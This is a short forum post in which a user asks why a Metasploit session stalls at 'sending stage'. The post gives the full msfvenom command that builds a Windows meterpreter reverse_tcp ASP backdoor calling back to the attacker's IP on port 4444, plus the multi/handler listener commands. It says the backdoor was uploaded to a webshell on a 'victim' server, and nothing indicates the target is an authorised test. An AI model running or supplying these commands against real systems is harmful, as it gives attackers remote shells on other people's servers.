johan123 Posted June 18, 2017 Share Posted June 18, 2017 I made a backdoor and upload to webshell, msfvenom -p windows/meterpreter/reverse_tcp LHOST=MY_IP LPORT=4444 -f asp > /root/Desktop/shell.asp From my computer, use exploit/multi/handler set payload windows/meterpreter/reverse_tcp exploit -j -z When i run this, it stuck in "sending stage"! it is strange because my ip can detect victim ip but no any session with this exploit, can someone help me? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.